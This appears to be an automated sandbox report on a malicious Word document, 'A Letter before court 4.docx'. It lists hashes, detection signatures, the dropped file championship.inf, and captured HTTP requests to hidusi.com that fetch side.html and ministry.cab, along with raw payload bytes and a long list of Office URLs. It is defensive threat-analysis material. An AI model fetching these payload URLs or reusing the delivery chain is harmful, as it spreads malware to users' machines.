Windows Analysis Report A Letter before court 4.docx

Overview

General Information

Sample Name: A Letter before court 4.docx
Analysis ID: 476188
MD5: 1d2094ce85d66878ee079185e2761beb
SHA1: 53b31e513d8e23e30b7f133d4504ca7429f0e1fe
SHA256: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52
Tags: docxdodefoh_comhidusi_com
Infos:

Most interesting Screenshot:

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Document exploit detected (drops PE files)
Multi AV Scanner detection for dropped file
Office process drops PE file
Document exploit detected (process start blacklist hit)
Drops files with a non-matching file extension (content does not match file extension)
Queries the volume information (name, serial number etc) of a device
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\championship.inf Virustotal: Detection: 36% Perma Link
Source: C:\Users\user\AppData\Local\Temp\championship.inf ReversingLabs: Detection: 22%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: championship.inf.0.dr Jump to dropped file
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\control.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.3:49706 -> 23.106.160.25:80
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: hidusi.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.3:49707 -> 23.106.160.25:80
Source: winword.exe Memory has grown: Private usage: 0MB later: 78MB

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49167 -> 23.106.160.25:80
Source: Traffic Snort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49170 -> 23.106.160.25:80
Source: Traffic Snort IDS: 100000132 COMMUNITY WEB-MISC Proxy Server Access 23.106.160.25:80 -> 192.168.2.22:49168
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /e8c76295a5f9acb7/side.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: hidusi.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e8c76295a5f9acb7/side.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: hidusi.comIf-Modified-Since: Wed, 01 Sep 2021 12:29:06 GMTIf-None-Match: "18f1-5caee365a20d1-gzip"Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e8c76295a5f9acb7/ministry.cab HTTP/1.1Accept: */*Referer: http://hidusi.com/e8c76295a5f9acb7/side.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: hidusi.comConnection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: LEASEWEB-USA-SFO-12US LEASEWEB-USA-SFO-12US
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 02 Sep 2021 03:59:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 01 Sep 2021 12:29:06 GMTETag: "18f1-5caee365a20d1-gzip"Accept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 1757Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 59 69 4f db 48 18 fe de 5f 41 d9 0f 8e 37 97 cf 8c dd e0 4a 14 e8 16 2d 88 96 d2 2d ab 28 aa e6 f2 c6 6d 12 7b 13 87 d0 45 fc f7 7d 67 c6 67 48 42 da 52 69 b5 02 79 ec 99 f7 78 de 73 c6 ce c1 f3 e3 8b a3 ab 3f df 9e ec 8d d2 c9 f8 e5 b3 03 35 ec 1d 8c 38 66 30 ee 1d 4c 78 8a 61 31 4d da fc ef 45 74 13 ec 9f dc 26 d1 8c cf f7 f7 68 3c 4d f9 34 0d f6 db e6 fe 7a d2 eb f6 87 c3 f6 51 3c 49 70 1a 91 31 af b0 9c 9e 04 a6 e4 3a e8 66 9a 0e 48 cc be 4a 31 73 3a 8b 92 f4 e5 b3 1b 3c db c3 c6 27 e3 d6 b4 50 18 0c 34 d3 b2 b5 96 66 f7 5c df b5 7e 3f 9f 5f be bb 82 c7 34 ba e1 d7 30 76 cf 62 b8 76 ba 1d f9 0f b7 99 aa e3 98 2e 26 30 c2 4c 92 1c c3 f5 18 8b 7b 3a 8e e7 1c c6 43 9a 46 30 cc f8 24 be e1 47 a3 68 cc e0 69 32 7e 0d d7 e5 2c 4a b9 94 79 08 57 9c 62 21 35 1a cb 29 a9 41 00 86 61 ce d3 c3 34 9d 45 64 21 c9 7f b9 e1 b3 79 14 4f 03 b7 65 88 3f 41 31 17 3a a2 70 86 27 82 02 39 1e 32 bc 59 38 f9 70 f5 05 1e 59 86 f0 64 cc 33 a0 e3 d7 4a cd 38 a6 e0 b8 78 0a b7 a6 eb 03 cf e8 d5 1f 97 e9 42 a0 51 e6 be 97 9e aa c8 10 96 e1 f1 b8 34 ff 63 34 65 f1 12 9e f9 24 11 c6 97 74 17 e4 b3 f0 c9 2c 4e e3 f4 6b 22 d5 85 02 26 f9 cc 69 2a cd 9a 0a 5f e0 24 81 9b dc 33 67 f1 b2 4b 47 78 92 00 aa f9 28 4a 3a d1 34 84 69 91 34 a1 c2 6c 02 52 cb 49 ce c8 69 22 d4 fe 76 22 82 94 ac 63 32 4d c3 9f 9f c7 d7 d7 d7 79 e0 0e 95 28 01 a5 7b a5 4c 11 7e 36 97 ff bc 4b 8e 2e 84 11 12 d9 5a 08 ae 65 39 a6 cb 26 d1 e5 07 25 26 4d 5e 74 bb a3 88 2d e6 51 87 c6 93 2e f7 28 ea 59 be 8b dd d0 c7 94 a0 ee 24 9a 46 f3 74 f6 b5 43 31 01 0e cf b3 2d 63 f9 f1 af 31 7d 05 4f d7 e7 67 6f 40 c4 25 24 32 9f 4b b7 3e 54 79 28 d1 1c bf e0 8c 50 1b 39 b4 ed 22 db 68 3b b6 85 db c4 25 5e 9b 71 df 09 0d e2 22 cb 44 40 18 83 23 61 80 3c 87 eb 9b ab f3 b3 32 e0 60 3c 5c 21 91 85 91 a6 61 bd e6 6f 0f 3f 1e 69 c3 7e b8 98 52 91 01 59 1d b8 9c 36 60 b4 2d 9f 11 dc 82 3b a7 67 1a 88 ea 77 33 9e 2e 66 15 aa 20 67 6c 64 e5 83 dc 56 b6 c4 5c fd ae 98 0c 8a bb b6 71 8b 71 5f 94 1c 4c b9 18 21 83 06 45 f1 0d 0a b2 61 3f 53 55 50 f5 ef 5b db c1 f5 ef 1b 55 34 ae ef 7b 2e 93 68 10 e1 cc d3 ef 32 a5 26 c7 d4 37 82 42 58 7f 09 49 c7 1b cf 9f 0f 86 fa 1d c4 29 a7 b3 42 c4 2d 16 24 78 36 e7 a7 d3 b4 51 b0 36 8c 5b ca 75 bd b9 76 05 14 e9 bf ae e7 71 36 f1 50 1f 78 da 6b 97 30 db c4 44 cc 8d e2 28 ac ac 17 47 37 32 31 ac eb fd 28 6c 94 86 07 41 e9 3b 32 e3 f8 4b 9f 8f e7 7c af 70 ed 40 4b 16 f3 91 36 6c 54 66 20 6b c3 14 a6 40 d6 3d f4 14 3a 92 91 72 70 68 72 99 0d bb 71 de df 37 8a 94 68 01 09 0b 91 a9 b7 8a e0 16 91 b4 38 b7 0c 54 46 52 04 db 42 3e c7 24 58 ca 7e 24 a3 4f 7c 9b a1 a0 58 1a 14 8c c2 89 8e 3e 14 44 34 74 b1 b5 89 c6 d3 87 83 4
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 02 Sep 2021 03:59:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 01 Sep 2021 12:29:06 GMTETag: "18f1-5caee365a20d1-gzip"Accept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 1757Keep-Alive: timeout=5, max=97Connection: Keep-AliveContent-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 59 69 4f db 48 18 fe de 5f 41 d9 0f 8e 37 97 cf 8c dd e0 4a 14 e8 16 2d 88 96 d2 2d ab 28 aa e6 f2 c6 6d 12 7b 13 87 d0 45 fc f7 7d 67 c6 67 48 42 da 52 69 b5 02 79 ec 99 f7 78 de 73 c6 ce c1 f3 e3 8b a3 ab 3f df 9e ec 8d d2 c9 f8 e5 b3 03 35 ec 1d 8c 38 66 30 ee 1d 4c 78 8a 61 31 4d da fc ef 45 74 13 ec 9f dc 26 d1 8c cf f7 f7 68 3c 4d f9 34 0d f6 db e6 fe 7a d2 eb f6 87 c3 f6 51 3c 49 70 1a 91 31 af b0 9c 9e 04 a6 e4 3a e8 66 9a 0e 48 cc be 4a 31 73 3a 8b 92 f4 e5 b3 1b 3c db c3 c6 27 e3 d6 b4 50 18 0c 34 d3 b2 b5 96 66 f7 5c df b5 7e 3f 9f 5f be bb 82 c7 34 ba e1 d7 30 76 cf 62 b8 76 ba 1d f9 0f b7 99 aa e3 98 2e 26 30 c2 4c 92 1c c3 f5 18 8b 7b 3a 8e e7 1c c6 43 9a 46 30 cc f8 24 be e1 47 a3 68 cc e0 69 32 7e 0d d7 e5 2c 4a b9 94 79 08 57 9c 62 21 35 1a cb 29 a9 41 00 86 61 ce d3 c3 34 9d 45 64 21 c9 7f b9 e1 b3 79 14 4f 03 b7 65 88 3f 41 31 17 3a a2 70 86 27 82 02 39 1e 32 bc 59 38 f9 70 f5 05 1e 59 86 f0 64 cc 33 a0 e3 d7 4a cd 38 a6 e0 b8 78 0a b7 a6 eb 03 cf e8 d5 1f 97 e9 42 a0 51 e6 be 97 9e aa c8 10 96 e1 f1 b8 34 ff 63 34 65 f1 12 9e f9 24 11 c6 97 74 17 e4 b3 f0 c9 2c 4e e3 f4 6b 22 d5 85 02 26 f9 cc 69 2a cd 9a 0a 5f e0 24 81 9b dc 33 67 f1 b2 4b 47 78 92 00 aa f9 28 4a 3a d1 34 84 69 91 34 a1 c2 6c 02 52 cb 49 ce c8 69 22 d4 fe 76 22 82 94 ac 63 32 4d c3 9f 9f c7 d7 d7 d7 79 e0 0e 95 28 01 a5 7b a5 4c 11 7e 36 97 ff bc 4b 8e 2e 84 11 12 d9 5a 08 ae 65 39 a6 cb 26 d1 e5 07 25 26 4d 5e 74 bb a3 88 2d e6 51 87 c6 93 2e f7 28 ea 59 be 8b dd d0 c7 94 a0 ee 24 9a 46 f3 74 f6 b5 43 31 01 0e cf b3 2d 63 f9 f1 af 31 7d 05 4f d7 e7 67 6f 40 c4 25 24 32 9f 4b b7 3e 54 79 28 d1 1c bf e0 8c 50 1b 39 b4 ed 22 db 68 3b b6 85 db c4 25 5e 9b 71 df 09 0d e2 22 cb 44 40 18 83 23 61 80 3c 87 eb 9b ab f3 b3 32 e0 60 3c 5c 21 91 85 91 a6 61 bd e6 6f 0f 3f 1e 69 c3 7e b8 98 52 91 01 59 1d b8 9c 36 60 b4 2d 9f 11 dc 82 3b a7 67 1a 88 ea 77 33 9e 2e 66 15 aa 20 67 6c 64 e5 83 dc 56 b6 c4 5c fd ae 98 0c 8a bb b6 71 8b 71 5f 94 1c 4c b9 18 21 83 06 45 f1 0d 0a b2 61 3f 53 55 50 f5 ef 5b db c1 f5 ef 1b 55 34 ae ef 7b 2e 93 68 10 e1 cc d3 ef 32 a5 26 c7 d4 37 82 42 58 7f 09 49 c7 1b cf 9f 0f 86 fa 1d c4 29 a7 b3 42 c4 2d 16 24 78 36 e7 a7 d3 b4 51 b0 36 8c 5b ca 75 bd b9 76 05 14 e9 bf ae e7 71 36 f1 50 1f 78 da 6b 97 30 db c4 44 cc 8d e2 28 ac ac 17 47 37 32 31 ac eb fd 28 6c 94 86 07 41 e9 3b 32 e3 f8 4b 9f 8f e7 7c af 70 ed 40 4b 16 f3 91 36 6c 54 66 20 6b c3 14 a6 40 d6 3d f4 14 3a 92 91 72 70 68 72 99 0d bb 71 de df 37 8a 94 68 01 09 0b 91 a9 b7 8a e0 16 91 b4 38 b7 0c 54 46 52 04 db 42 3e c7 24 58 ca 7e 24 a3 4f 7c 9b a1 a0 58 1a 14 8c c2 89 8e 3e 14 44 34 74 b1 b5 89 c6 d3 87 83 4a
Source: YQ8Q39W5.HTM.0.dr String found in binary or memory: http://hidusi.com/e8c76295a5f9acb7/ministry.cab
Source: YQ8Q39W5.HTM.0.dr String found in binary or memory: http://hidusi.com/e8c76295a5f9acb7/ministry.cab)
Source: ~WRS{DDA3C8BF-F833-4E25-B392-A0D975DFB1BC}.tmp.0.dr String found in binary or memory: http://hidusi.com/e8c76295a5f9acb7/side.html
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://api.cortana.ai
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://api.office.net
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://api.onedrive.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://augloop.office.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://cdn.entity.
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://cortana.ai
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://cortana.ai/api
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://cr.office.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://dev.cortana.ai
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://directory.services.
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://graph.windows.net
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://graph.windows.net/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://login.windows.local
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://management.azure.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://management.azure.com/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://messaging.office.com/
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://ncus.contentsync.
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 9016AF0D-7AC1-4FEE-A5B8-D20651594FEA.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
